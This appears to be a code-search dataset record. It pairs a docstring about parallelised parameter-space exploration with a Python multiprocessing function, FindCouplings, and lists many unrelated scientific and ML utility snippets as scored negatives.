self.get_Rbo()\n alpha = self.comp_alpha()\n\n if self.W0 < (self.W2 + self.W3):\n raise S51_WCheckError(\"You must have W2+W3 < W0\")\n\n if Rbo < self.H0 + self.H2:\n raise S51_RHCheckError(\"You must have H0+H2 < Rbo\")\n\n if alpha > pi / 2:\n raise S51_AlphaCheckError(\"You must have alpha < pi/2\")", "def check_params(self, params):\n legal_params_fns = [\n Sequential.fit, Sequential.predict, Sequential.predict_classes,\n Sequential.evaluate\n ]\n if self.build_fn is None:\n legal_params_fns.append(self.__call__)\n elif (not isinstance(self.build_fn, types.FunctionType) and\n not isinstance(self.build_fn, types.MethodType)):\n legal_params_fns.append(self.build_fn.__call__)\n else:\n legal_params_fns.append(self.build_fn)\n\n legal_params = []\n for fn in legal_params_fns:\n legal_params += tf_inspect.getargspec(fn)[0]\n legal_params = set(legal_params)\n\n for params_name in params:\n if params_name not in legal_params:\n if params_name != 'nb_epoch':\n raise ValueError('{} is not a legal parameter'.format(params_name))", "def params_ok(): \n \n if parameters['details'].lower() in ['true', 'yes', '1']:\n parameters['details'] = True\n elif parameters['details'].lower() in ['false', 'no', '0']:\n parameters['details'] = False\n else:\n print 'unrecognized input for details = %s, so set details=False' % parameters['details']\n parameters['details'] = False\n\n if not parameters['db_tables']:\n parameters['db_tables'] = DB_TABLES\n\n # FIXME ideally, pre-check for tables on hosts here before diving in\n\n return True # params are OK; otherwise, we returned False above" ]
[ "0.63886017", "0.6310672", "0.6199619", "0.6192125", "0.6176082", "0.61694586", "0.613159", "0.6075696", "0.60116005", "0.60115665", "0.5992061", "0.5970435", "0.59513295", "0.59481025", "0.5932262", "0.5915817", "0.58968824", "0.5866027", "0.58604413", "0.58546996", "0.58375925", "0.58375573", "0.58325803", "0.5825981", "0.5784302", "0.5778824", "0.57676834", "0.576186", "0.57133454", "0.5711805", "0.57001114", "0.56935096", "0.5691999", "0.5654682", "0.56437594", "0.5633121", "0.5633121", "0.5633121", "0.5631674", "0.5590833", "0.5578843", "0.55777925", "0.5574356", "0.555811", "0.5548875", "0.55454713", "0.5528521", "0.55122304", "0.550939", "0.5492451", "0.5486101", "0.54851764", "0.5482382", "0.54775655", "0.5474786", "0.54708785", "0.54690886", "0.5464669", "0.54464996", "0.5411782", "0.5409775", "0.53883797", "0.5382028", "0.5381762", "0.5370669", "0.5365636", "0.53593105", "0.5356754", "0.5353184", "0.534626", "0.5345122", "0.53384435", "0.5332505", "0.532314", "0.53228366", "0.53209907", "0.5318769", "0.5318197", "0.5312943", "0.53116834", "0.53061616", "0.5305841", "0.53045243", "0.53041714", "0.5301336", "0.5297185", "0.5291291", "0.5291207", "0.5290295", "0.52873987", "0.52712196", "0.52710766", "0.5268249", "0.5267427", "0.526123", "0.526123", "0.526026", "0.52502877", "0.5250202", "0.52497876" ]
0.53065354
80
We get points to check, and parallelize the checking of the points. This is the function that does all the work in terms of exploring the parameter space.
def FindCouplings():
    l1v = np.linspace(l1min, l1max, num=48)
    l2v = np.logspace(np.log10(l2min), np.log10(l2max), num=48)
    l3v = np.linspace(l3min, l3max, num=48)
    gxv = np.linspace(gxmin, gxmax, num=48)
    p = multiprocessing.Pool()
    f = open(file_name, 'w+')
    line = '|l1--l2--l3--gx--minima--mass1--mass2--stable|'
    f.write(line+'\n')
    f.write('-'*90+'\n')
    f.close()
    for l1 in l1v:
        for l2 in l2v:
            start_time_loop = time.time()
            params = cartesian((l1, -l2, l3v, gxv))
            print params.shape
            p.map(CheckCouplings, params)
            print("--- Loop has taken: %s seconds ---" % (time.time() - start_time_loop))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_parallel_computing(self, example_staypoints):\n sp = example_staypoints\n\n # without parallel computing code\n sp_ori, locs_ori = sp.as_staypoints.generate_locations(\n method=\"dbscan\", epsilon=10, num_samples=2, distance_metric=\"haversine\", agg_level=\"user\", n_jobs=1\n )\n # using two cores\n sp_para, locs_para = sp.as_staypoints.generate_locations(\n method=\"dbscan\", epsilon=10, num_samples=2, distance_metric=\"haversine\", agg_level=\"user\", n_jobs=2\n )\n\n # the result of parallel computing should be identical\n assert_geodataframe_equal(locs_ori, locs_para)\n assert_geodataframe_equal(sp_ori, sp_para)", "def final_check(points):\n for p in points:\n constraints = p.constraints\n if len(p.lies_on) == 1:\n if [x for x in p.lies_on][0].symify() is not None:\n p.x, p.y = [x for x in p.lies_on][0].arbitrary_point()\n return p\n else:\n return None\n elif len(p.lies_on) > 1:\n symified_constraints = []\n # Get all of the constraints that we have processed and given\n # locations to\n for x in p.lies_on:\n tmp = x.symify()\n if tmp is not None:\n symified_constraints.append(tmp)\n # Ensure that we have at least two constraints\n # (to define an intersection); if not go to the next point\n if len(symified_constraints) >= 2:\n # Compute the intersection\n intersection = sympy.intersection(*symified_constraints)\n if intersection:\n p.x = float(intersection[0].x)\n p.y = float(intersection[0].y)\n return p\n else:\n return None\n\n if all([type(c) == primitives.Line for c in constraints]):\n p.x = random.uniform(-1, 1)\n p.y = random.uniform(-1, 1)\n return p\n elif [type(c) for c in constraints].count(primitives.Circle) == 1:\n for c in constraints:\n if type(c) == primitives.Circle:\n circle = c\n break\n if circle.symify() is not None:\n p.x, p.y = circle.arbitrary_point()\n return p\n return None", "def check_keypoints(keypoints: Sequence[Sequence], rows: int, cols: int) -> None:\n for kp in keypoints:\n check_keypoint(kp, rows, cols)", "def Check(self, parameters):", "def check_evaluation_points(x, y):\n assert x.ndim == y.ndim == 1\n assert x.shape == y.shape\n assert x.dtype == y.dtype == np.float64", "def parameter_check(coordinates, \n neighbors, \n bandwidth, \n convergence, \n percentage):\n # Create a boolean vector to keep track of incorrect inputs\n incorrect_inputs = np.zeros(5, dtype = bool)\n # Check whether two-dimensional coordinates are provided\n if not type(coordinates) == np.ndarray:\n incorrect_inputs[0] = True\n elif not coordinates.shape[1] == 2:\n incorrect_inputs[0] = True\n # Check whether neighbors is a positive integer or float\n if not ((type(neighbors) == int and neighbors > 0)\n and not ((type(neighbors) == float) \n and (neighbors > 0)\n and (neighbors.is_integer() == True))):\n incorrect_inputs[1] = True\n # Check whether bandwidth is a positive integer or float\n if not bandwidth == None:\n if not ((type(bandwidth) == int and bandwidth > 0)\n or (type(bandwidth) == float) and bandwidth > 0):\n incorrect_inputs[2] = True\n # Check whether convergence is a positive integer or float\n if not convergence == None:\n if not ((type(convergence) == int and convergence > 0)\n or (type(convergence) == float) and convergence > 0):\n incorrect_inputs[3] = True\n # Check whether percentage is a valid percentage value\n if not percentage == None:\n if not ((type(percentage) == int and percentage >= 0 \n and percentage <= 100)\n or ((type(percentage) == float) and percentage >= 0 \n and percentage <= 100)):\n incorrect_inputs[4] = True\n # Define 
error messages for each parameter failing the tests\n errors = ['ERROR: coordinates: Must be a 2-column numpy.ndarray',\n 'ERROR: neighbors: Must be a whole-number int or float > 0',\n 'ERROR: bandwidth: Must be an int or float > 0, or None',\n 'ERROR: convergence: Must be an int or float > 0, or None',\n 'ERROR: percentage: Must be an int or float in [0, 100], or None']\n # Print eventual error messages and terminate the code\n if any(value == True for value in incorrect_inputs):\n for i in range(0, len(errors)):\n if incorrect_inputs[i] == True:\n print(errors[i])\n sys.exit()", "def check_additional_input():\r\n\r\n # Check if the cluster center input is correct\r\n RM.check_if_matrix(clust_cent, 'The cluster centers')\r\n RM.warn_if_bigger(clust_cent.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the cluster centers',\r\n 'the number of input parameters - 1')\r\n RM.check_if_bigger(clust_cent.shape[1], meta_model.get_in_par_means().shape[1] - 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the cluster centers')\r\n\r\n bounds = meta_model.get_in_par_intervals()\r\n\r\n for j in range(clust_cent.shape[0]):\r\n for i in range(bounds.shape[0]):\r\n RM.check_if_in_interval(bounds[i], clust_cent[j, i], i, ' In cluster center %x, the value')\r\n\r\n def check_PLSR_input():\r\n \"\"\" Checks model data of PLSR\r\n\r\n :return: Checks model data of PLSR\r\n \"\"\"\r\n\r\n RM.check_if_ndim_array(model_data, 3, 'Model data')\r\n RM.check_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the solution matrix',\r\n 'the number of input parameters')\r\n RM.warn_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1] + 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the solution matrix')\r\n RM.check_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1] - 1,\r\n 'The number of output parameters in the solution matrix',\r\n 'the number of output parameters')\r\n RM.warn_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1],\r\n 'The number of output parameters',\r\n 'the number of output parameters in the solution matrix')\r\n\r\n # Check if the additional data is correct\r\n\r\n if meta_model.get_type() == 'PLSR': # Additional check-up for PLSR\r\n check_PLSR_input()\r\n\r\n elif meta_model.get_type() == 'DLU': # Additional check-up for DLU\r\n raise TypeError('This part is not implemented yet')\r\n\r\n # if not isinstance(model_data, np.ndarray):\r\n # raise TypeError('The cluster input and output data is not stored in a multidimensional array')\r\n #\r\n # for clust_data in model_data:\r\n #\r\n # if not isinstance(clust_data[0], np.matrix) or not isinstance(clust_data[1], np.matrix):\r\n # raise TypeError('One of the input or output databases is not a matrix')\r\n #\r\n # if clust_data[0].shape[1] > meta_model.get_in_par_means().shape[1]:\r\n # warnings.warn('The number of input parameters for the input database of the clusters is bigger '\r\n # 'than the actual number of input parameters')\r\n #\r\n # elif clust_data[0].shape[1] < meta_model.get_in_par_means().shape[1]:\r\n # raise TypeError('The number of input parameters for the input database of the clusters is '\r\n # 'smaller than the actual numbers of input parameters')\r\n #\r\n # if clust_data[1].shape[1] > meta_model.get_out_par_means().shape[1]:\r\n # raise TypeError('The number of output parameters for the output database of 
the clusters is '\r\n # 'bigger than the actual number of output parameters')\r\n #\r\n # elif clust_data[1].shape[1] < meta_model.get_out_par_means().shape[1]:\r\n # raise TypeError('The number of output parameters for the output database of the clusters is '\r\n # 'smaller than the actual numbers of output parameters')\r\n #\r\n # if clust_data[0].shape[0] != clust_data[1].shape[0]:\r\n # raise TypeError('The number rows in the input and output database differ from each other')\r\n\r\n else: # No check-up is done when the meta-model is an unknown version\r\n warnings.warn('The additional cluster data can not be checked, for this kind of meta-model')\r\n\r\n RM.check_if_same_size(clust_cent.shape[0], model_data.shape[0],\r\n 'The number of clusters according to the cluster centers',\r\n 'The number of clusters according to the model_data')", "def brute_force(savedPnts, unitRadius, point):\n for pnt in savedPnts:\n d = distance(pnt, point)\n if d < unitRadius: return False\n return True", "def check_all(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim):\n\tcheck_dimensions(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)\n\tcheck_coords(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)\n\tcheck_consistent(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)\n\tcheck_type(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)\n\t#check_transposed(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim)", "def grid_evaluation(param_list_one, param_list_two, param_eval, n_trials=16, \n aggr_method=np.mean, save_dir='data/', file_name='grid evaluation',\n save_to_disk=True, save_each=1000, chunksize=1.):\n \n \n if not list(param_list_two): # If `param_list_two` is empty\n params = param_list_one\n grid_shape = (len(param_list_one),)\n is_really_grid = False\n \n else:\n params = list(itertools.product(param_list_one, param_list_two))\n grid_shape = (len(param_list_one), len(param_list_two))\n is_really_grid = True\n \n def grid_fun(point): # Function to compute for each grid point\n \n trial_out = np.nan * np.ones((n_trials,))\n \n for i in np.arange(n_trials):\n \n if is_really_grid:\n trial_out[i] = param_eval(point[0], point[1])\n else: # If `param_list_two` is empty\n trial_out[i] = param_eval(point)\n \n return aggr_method(trial_out)\n \n n_grid_pts = len(params)\n \n # Recording procedure\n def record_experiment(grid):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n save_path = save_dir + now + ' ' + file_name + '.pkl'\n experiment = {\n 'date': now,\n 'rows': param_list_one,\n 'cols': param_list_two,\n 'n_trials': n_trials,\n 'grid': np.reshape(grid, grid_shape),\n 'path': save_path\n }\n if save_to_disk:\n utils.save_obj(experiment, save_path)\n return experiment\n \n # Set a pool of workers\n nb_workers = min(mp.cpu_count(), 24)\n print('Working with {} processes.'.format(nb_workers))\n pool = mp.Pool(nb_workers)\n \n # Iterate `grid_fun` across workers\n it = pool.imap(grid_fun, params, chunksize=chunksize)\n grid = np.nan * np.ones((n_grid_pts,))\n\n for idx, val in enumerate(tqdm(it, total=n_grid_pts)):\n grid[idx] = val\n \n # Make sure that we save after each couple of iterations\n if (idx >= save_each) and (idx % save_each == 0): \n experiment = record_experiment(grid)\n \n # Close pool\n pool.close()\n pool.join()\n \n experiment = record_experiment(grid)\n \n return experiment", "def pointfind(plat, plon, lat, lon, pdif = 1):\n\t\n\tfff = 10\n\twhile (fff > 1):\n\t\t\n\t\t#conditions for latitude (lat - 2d array of 
latitudes)\n\t\tc_lat=(lat>(plat-pdif))&(lat<(plat+pdif))\n\t\t#conditions for longiyude (lon - 2d array of longitudes)\n\t\tc_lon=(lon>(plon-pdif))&(lon<(plon+pdif))\n\t\t\n\t\t#combine both conditions together\n\t\tc_all=c_lat&c_lon\n\t\t\n\t\t#values of the points that fulfil conditions\n\t\tplatf = lat[numpy.nonzero(c_all)]\n\t\tplonf = lon[numpy.nonzero(c_all)]\n\t\t\n\t\t\t\t\n\t\t#indeces of the poin that fulfil conditions \n\t\tg = numpy.nonzero(c_all)\n\t\t\n\t\t\n\t\t#check if we have found uniq solution\n\t\tfff = platf.shape[0]\n\t\t# decrease window to reduce amount of solutions if we have more than one\n\t\t#print(pdif)\n\t\tpdif = pdif-0.001\n\tprint(\"coordinates of the point that fulfil conditions: \"+str(platf)+\" \"+str(plonf))\n\tprint(\"indeces of the point that fulfil conditions: \"+str(g[0])+\" \"+str(g[1]))\n\t\n\treturn(g, platf, plonf)", "def evaluate_all_points():\n start_time = timeit.default_timer()\n mua, vra = pgen.get_pdf()\n slack = ptsl.D\n\n all_alloc = list(itertools.product(range(1,ptsl.M+1),repeat=ptsl.NPH))\n riska = []\n f2 = open(\"risk-file-D216-NPH5.csv\",\"w\")\n f2.write(\"alloc1,alloc2,alloc3,alloc4,alloc5,risk,util\\n\")\n count = 0\n for a in all_alloc :\n a1, a2, a3, a4, a5 = a\n r = compute_risk(mua, vra, a, slack)\n \n if r > 0.00001 and r < 1 - 0.00001 :\n riska.append(r)\n util = a1 * mua[a1-1] + a2 * mua[a2-1] + a3 * mua[a3-1] + a4 * mua[a4-1] + a5 * mua[a5-1]\n f2.write(\"%d,%d,%d,%d,%d,%f,%f\\n\"%(a1,a2,a3,a4,a5,r,util))\n count = count + 1\n f2.close()\n np.save(\"stored_risk\",riska)\n elapsed = timeit.default_timer() - start_time\n print(\"Brute Force Evaluation Time for %d points : %fs\"%(count,elapsed))", "def search(y, x, optimize_on=\"te_loss\", split_method = 'mass'):\n\n \n\t# split the data (8 model)\n\tsplit_train = split.split(y, x, method= split_method)\n\n\t# large range of parameter\n\tdegrees = range(2, 15)\n\tlambdas = np.logspace(-5, 10)\n\n\n\tlambdas_star = []\n\tdegrees_star = []\n\tprint(\"start search\")\n\tfor i, splitted_set in enumerate(split_train):\n\t\tsub_y, sub_x, id_indices = splitted_set\n\n\t\t# first rough search with large scale\n\t\tlambda_star, degree_star, score = _inner_search(sub_y, sub_x, degrees, lambdas, optimize_on)\n\n\t\t# zoomed search around best parameters\n\t\t# zoomed_degree = range(degree_star-2, degree_star + 2)\n\t\tzoomed_lambda = np.logspace(lambda_star - 2, lambda_star + 2, 25)\n\t\tlambda_star, degree_star, score = _inner_search(sub_y, sub_x, degrees, zoomed_lambda, optimize_on)\n\n\t\t# store found values\n\t\tlambdas_star.append(lambda_star)\n\t\tdegrees_star.append(degree_star)\n\n\t\t# print summary\n\t\tprint(\"-------------------------------------\")\n\t\tprint(\"Set\", i)\n\t\tprint(\"-------------------------------------\")\n\t\tprint(\"lambda*:\", lambda_star)\n\t\tprint(\"degree: \", degree_star)\n\t\tif optimize_on == \"te_loss\":\n\t\t\tprint(\"test set loss: \", score)\n\t\telif optimize_on == \"accu\":\n\t\t\tprint(\"accuracy: \", score)\n\n\tprint(\"...............................\")\n\tprint(\"end\")\n\treturn lambdas_star, degrees_star", "def check_kpts(self):\n if 'fleurinp' in self.ctx.inputs:\n fleurinp = self.ctx.inputs.fleurinp\n else:\n fleurinp = get_fleurinp_from_remote_data(self.ctx.inputs.parent_folder)\n\n only_even_MPI = self.inputs.add_comp_para['only_even_MPI']\n forbid_single_mpi = self.inputs.add_comp_para['forbid_single_mpi']\n try:\n machines, mpi_tasks, omp_threads, message = optimize_calc_options(self.ctx.num_machines,\n 
self.ctx.num_mpiprocs_per_machine,\n self.ctx.num_cores_per_mpiproc,\n self.ctx.use_omp,\n self.ctx.suggest_mpi_omp_ratio,\n fleurinp,\n only_even_MPI=only_even_MPI,\n forbid_single_mpi=forbid_single_mpi)\n except ValueError as exc:\n self.report(exc)\n return self.exit_codes.ERROR_NOT_OPTIMAL_RESOURCES\n\n self.report(message)\n\n self.ctx.inputs.metadata.options['resources']['num_machines'] = machines\n self.ctx.inputs.metadata.options['resources']['num_mpiprocs_per_machine'] = mpi_tasks\n if self.ctx.use_omp:\n self.ctx.inputs.metadata.options['resources']['num_cores_per_mpiproc'] = omp_threads\n if 'environment_variables' not in self.ctx.inputs.metadata.options:\n self.ctx.inputs.metadata.options['environment_variables'] = {}\n self.ctx.inputs.metadata.options['environment_variables']['OMP_NUM_THREADS'] = str(omp_threads)", "def globalcheck(xx, checktimes, thres, n, nn):\n result = np.zeros((3, n))\n checkstep = nn // checktimes\n absxx = np.abs(xx)\n for i in range(n):\n for k in range(2):\n for j in range(checktimes):\n if absxx[1 + j * checkstep, k * n + i] > thres[k]:\n result[k, i] = 1\n break\n result[2, i] = np.max(result[:, i])\n\n return result", "def check(self, num_objfun):\n if not self.gp:\n raise Exception(\"No number of grid points provided\")\n\n if self.nadir_p and len(self.nadir_p) != num_objfun - 1:\n raise Exception(\"Too many or too few nadir points provided\")", "def check_location_confidence(self):\n\t\t## not the best way of doing things, but since the number of targets is fairly small its not a big deal\n\t\tepsilon_pixels = .05 * self.horizontal_resolution #arbitrary confidence factor\n\t\tepsilon_meters = .08\n\t\tpixel_distances = []\n\t\tactual_distances = []\n\t\tnum_observed = 0\n\t\tfor ti in self.targs:\n\t\t\tif ti.props_are_set:\n\t\t\t\tfor tj in self.targs:\n\t\t\t\t\tif tj.props_are_set: \n\t\t\t\t\t\tpixel_dist = np.linalg.norm(tj.position_camera - ti.position_camera)\n\t\t\t\t\t\tactual_dist = np.abs(tj.d_cam_image - ti.d_cam_image)\n\t\t\t\t\t\tif pixel_dist == 0:\n\t\t\t\t\t\t\tpixel_dist = 10000 #ignore two of the same points\n\t\t\t\t\t\t\tactual_dist = 10000\n\t\t\t\t\t\tpixel_distances.append(pixel_dist)\t\n\t\t\t\t\t\tactual_distances.append(actual_dist)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpixel_distances.append(10000)\n\t\t\t\t\t\tactual_distances.append(10000)\n\t\t\telse:\n\t\t\t\tfor _ in self.targs:\n\t\t\t\t\tpixel_distances.append(10000)\n\t\t\t\t\tactual_distances.append(10000)\n\t\tmin_ind_pixel = np.argmin(pixel_distances)\n\t\tmin_ind_actual = np.argmin(actual_distances)\n\t\t#min_ind is encoded in base (num_targets); decode it to find the closest two points\n\t\tbest_guys = [self.targs[min_ind_pixel/len(self.targs)],self.targs[min_ind_pixel%len(self.targs)]]\n\t\tif pixel_distances[min_ind_pixel] > epsilon_pixels or actual_distances[min_ind_actual] > epsilon_meters:\n\t\t\t#measurements are not trustworthy, return nothing\n\t\t\treturn None\n\n\t\treturn best_guys", "def iterative_function(points, numLines, numIter, e_tilde, gamma_tilde, beta_tilde):\n \n numPoints = len(points)\n \n # Randomly sample pairs and get the corresponding rho and theta parameters for a line fitted to the pair: \n # Returns a list of tuples - Each tuple has the rho and theta parameters for the line: \n lines ,idxs = info_rand_sample_fit_lines(points, numLines)\n \n \n # Compute normal distance of each point from each line: Store in a 2-D numpy array: \n # Points along 1st axis - Rows - axis= 0\n # Lines along 2nd axis - Columns - axis=1\n \n # Initialize 
the 2-D array: \n normDist = np.zeros((numPoints, numLines))\n \n \n # Indices for the 2-D array: \n j,k = 0,0\n \n # Loop through points:\n for point in points: \n \n k = 0\n \n # Loop through the lines: \n for line in lines:\n \n normDist[j,k] = get_normal_dist(line,point)\n \n # Increment the column (line) index:\n k+=1\n \n \n #Increment the row (point) index\n j += 1\n \n # Transform the Normal Distance matrix to the Probability of Membership matrix: \n Pr_C = log_dec(normDist,e_tilde)\n \n \n ## Iteratively refine estimates of Prob of Validity - Points and Lines: \n iterCount = 0\n \n # Initialize Probability of Validity of points and lines: \n initProb =1\n Pr_A = initProb*np.ones((numPoints,1))\n Pr_V = np.zeros((numLines,1))\n \n \n # Initialize gamma and beta: Fractions of valid points and lines respectively: \n gamma = np.zeros_like(Pr_V)\n beta = np.zeros_like(Pr_A)\n \n \n while iterCount < numIter: \n \n # For each line: \n for k in range(numLines):\n \n # Compute expected fraction of valid points: \n gamma[k] = np.dot(Pr_A.T, Pr_C[:,k])/np.sum(Pr_A)\n \n #print (gamma[k], end=\" ->\")\n \n # Compute Probability of Validity: \n Pr_V = log_inc(gamma, gamma_tilde)\n \n \n \n # For each point: \n for j in range(numPoints):\n \n # Compute expected fraction of valid lines in which it is a member: \n beta[j] = np.dot(Pr_V.T, Pr_C[j,:])/np.sum(Pr_V)\n \n \n #print (beta[j], end=\" ->\")\n \n #print (\" \")\n \n # Compute Probability of Validity: \n Pr_A = log_inc(beta, beta_tilde)\n \n \n iterCount +=1\n \n # Sort the lines according to Probability of Validity:\n idx_sort = np.argsort(Pr_V, axis=0)\n \n print (\" The equations of candidate lines and their probability of validity are: \") \n\n \n for idx in idx_sort: \n print (lines[int(idx)] , end = '-- >')\n print (Pr_V[idx])\n \n return lines, Pr_A, Pr_V", "def main_eaftest(point_ind, permutations=10240, alpha=0.05):\n \n # ------ Attainment indicator values information ------\n \n npoints = len(point_ind)\n nvars = len(point_ind[0]) # Número de execuções total\n nruns = nvars // 2 # Número de execuções de 1 algo\n \n print \"- Attainment indicator values information:\"\n print \" * Number of points:\", npoints\n print \" * Joint executions:\", nvars, \"(%d + %d)\" % (nruns, nruns)\n print\n \n assert nvars % 2 == 0, \"Number of total joint executions must be even.\"\n assert nvars <= 64, \"Not implemented with more than 64 joint executions.\"\n \n # ------ Test Statistic ------\n\n print \"- Computing the test statistic...\" \n stat2 = libaft.ksstat(point_ind, order=2)\n print \" * Test statistic = %d/%d\" % (stat2, nruns)\n print \" = %f\" % (stat2 / float(nruns)), '\\n'\n \n # ------ Estimate null distribution ------\n\n print \"- Using %d random permutations to estimate null distribution.\" % permutations\n print \" Please be patient...\"\n maxdist = np.zeros(permutations, dtype=np.int32) # Max distance array\n rtime = time.time()\n \n masks = bintools.make_masks(permutations, nvars, seed=64)\n for i, maxd in enumerate(KERNEL.runkernel(point_ind, masks)):\n maxdist[i] = maxd\n if (i+1) % (permutations//20) == 0:\n print \" %6d permutations, %7.3f sec\" % (i+1, time.time()-rtime)\n print \" * Time elapsed: %7.3f\" % (time.time()-rtime)\n \n # Compute null distribution from max distance array\n tail = np.bincount(maxdist, minlength=nruns+1)\n print \" * Non-normalized null distribution:\"\n print tail\n print\n \n # ------ Accept/reject null hypothesis ------\n \n # NB: -1 resulta das diferentes convenções para a definição de 
valor crítico\n crit = criticalvalue(tail, alpha * permutations) - 1\n pval = pvalue(tail, stat2) / float(permutations)\n \n print \"- Null hypothesis decision:\" \n print \" * Critical value = %d/%d\" % (crit, nruns)\n print \" = %f\" % (crit / float(nruns))\n print \" * p-value = %f\" % pval\n if pval <= alpha:\n print \" <= alpha (%s)\\n\" % alpha\n print \" * Decision: REJECT the null hypothesis\"\n else:\n print \" > alpha (%s)\\n\" % alpha\n print \" * Decision: do NOT REJECT the null hypothesis\"\n print", "def do_pnp(pts3d_for_pnp, pts2d_for_pnp, K, iterations=200, reprojThresh=5):\n list_pts3d_for_pnp = pts3d_for_pnp\n list_pts2d_for_pnp = pts2d_for_pnp\n pts3d_for_pnp = np.array(pts3d_for_pnp)\n # pts2d_for_pnp = np.expand_dims(np.squeeze(np.array(pts2d_for_pnp)), axis=1)\n # print(pts3d_for_pnp)\n # print(pts2d_for_pnp.shape)\n num_pts = len(pts3d_for_pnp)\n print(num_pts)\n highest_inliers = 0\n for j in range(iterations):\n pt_idxs = np.random.choice(num_pts, 6, replace=False)\n pts3 = np.array([pts3d_for_pnp[pt_idxs[i]] for i in range(len(pt_idxs))])\n # print(\"pts\",pts3)\n pts2 = np.array([pts2d_for_pnp[pt_idxs[i]] for i in range(len(pt_idxs))])\n _, rvec, tvec = cv2.solvePnP(pts3, pts2, K, distCoeffs=np.array([]), flags=cv2.SOLVEPNP_ITERATIVE)\n R, _ = cv2.Rodrigues(rvec)\n pnp_errors, projpts, avg_err, perc_inliers = test_reproj_pnp_points(list_pts3d_for_pnp, list_pts2d_for_pnp, R, tvec, K, rep_thresh=reprojThresh)\n if highest_inliers < perc_inliers:\n highest_inliers = perc_inliers\n best_R = R\n best_tvec = tvec\n R = best_R\n tvec = best_tvec\n # print('rvec:', rvec,'\\n\\ntvec:', tvec)\n print(\"avg\",avg_err)\n print(\"inlier\",perc_inliers)\n return R, tvec", "def compute_parallel_points(self, sorted_pts, np, display_opt):\n # find lowest point (get point closest to epi_apex_node)\n numPoints = sorted_pts.shape[0]\n ds = np.zeros((numPoints,), dtype=float)\n\n epi_apex_node = np.asarray(self.epi_apex_node)\n\n for i in range(numPoints):\n ds[i] = np.linalg.norm(epi_apex_node - sorted_pts[i])\n\n lowest_point_id = np.argmin(ds)\n\n # create linspace using lowest point id\n num_pts_left = lowest_point_id\n num_pts_right = numPoints - lowest_point_id\n print('num pts left = ', num_pts_left)\n print('num points right = ', num_pts_right)\n\n scale = 0.3 # we only want 30% of points on one side\n max_ls_idx = int(scale * num_pts_left)\n max_rs_idx = int(scale * num_pts_right)\n idxs = np.arange(lowest_point_id-max_ls_idx, lowest_point_id+max_rs_idx, np, dtype=int)\n\n # get points\n parapts = np.zeros((np, 3), dtype=float)\n for i, idx in enumerate(idxs):\n parapts[i] = sorted_pts[idx]\n\n if display_opt:\n parapts_act = include_points(parapts, parapts.shape[0], 7, (0,1,0))\n ren = vtk.vtkRenderer()\n ren.SetBackground(1.0,1.0,1.0)\n ren.AddActor(self.endoActor)\n ren.AddActor(parapts_act)\n vtk_show(ren)\n\n return parapts", "def Checker(a,b,n,x):\n if n==0:\n if abs(a[0]-b[0])>=x: #if the changes in eta from one time step to another is more than .05mm\n return True #return true to continue the loop\n else:\n return False #stop the loop (this only happens if all of the points had a change of less than .05mm)\n elif abs(a[n]-b[n])>=x: #this checks each of the points in the channel \n return True #if any have too big a change the loop continues\n else: #if that point in the channel has small enough change\n Checker(a,b,n-1) #check the next point in the channel", "def isFree(point):\n global grid\n for i in point:\n if i < 0:\n return False\n try:\n value = 
grid[point[0]][point[1]][point[2]]\n # print value\n except:\n print \"point \", point, \"lies outside of grid\"\n value = False\n\n return value", "def check_box(volume,point,is_queued_map,is_visited_map):\n list_not_visited=[]\n list_not_queued = []\n list_are_near = []\n\n if point[0]==1227 and point[1]==735 and point[2]==27:\n pass\n\n\n for x in xrange(-1, 2):\n\n # Edgecase for x\n if point[0] + x < 0 or point[0] + x > volume.shape[0] - 1:\n continue\n\n for y in xrange(-1, 2):\n\n # Edgecase for y\n if point[1] + y < 0 or point[1] + y > volume.shape[1] - 1:\n continue\n\n for z in xrange(-1, 2):\n\n # Edgecase for z\n if point[2] + z < 0 or point[2] + z > volume.shape[2] - 1:\n continue\n\n # Dont look at the middle point\n if x == 0 and y == 0 and z == 0:\n continue\n\n # TODO case if loop, all are queued but not visited\n if volume[point[0] + x, point[1] + y, point[2] + z] == 1:\n\n\n list_are_near.extend([[point[0] + x, point[1] + y, point[2] + z]])\n\n if is_queued_map[point[0] + x, point[1] + y, point[2] + z]==0:\n list_not_queued.extend([[point[0] + x, point[1] + y, point[2] + z]])\n if is_visited_map[point[0] + x, point[1] + y, point[2] + z]==0:\n list_not_visited.extend([[point[0] + x, point[1] + y, point[2] + z]])\n\n is_visited_map[point[0],point[1],point[2]]=1\n return list_not_queued,list_not_visited,is_visited_map,list_are_near", "def iterate(self):\n ret = super(ExpandableAlgorithm, self).pre_iteration()\n if ret is None:\n return None\n active, passive, neighbors, features_active, features_passive = ret\n params = [features_active, features_passive]\n if self._post_args:\n params += self._post_args\n s = self._overlap_function(*params)\n if self.condition_axelrod:\n if self.__condition_axelrod(s, features_active, features_passive):\n return True\n if self.condition_centola:\n if self.__condition_centola(s, active, passive, neighbors):\n return True", "def _check_parameters(self, p, integral=False, name=None, sym=None):\n for h in range(self._.d + 1):\n for i in range(self._.d + 1):\n for j in range(self._.d + 1):\n p[h, i, j] = ASParameters. 
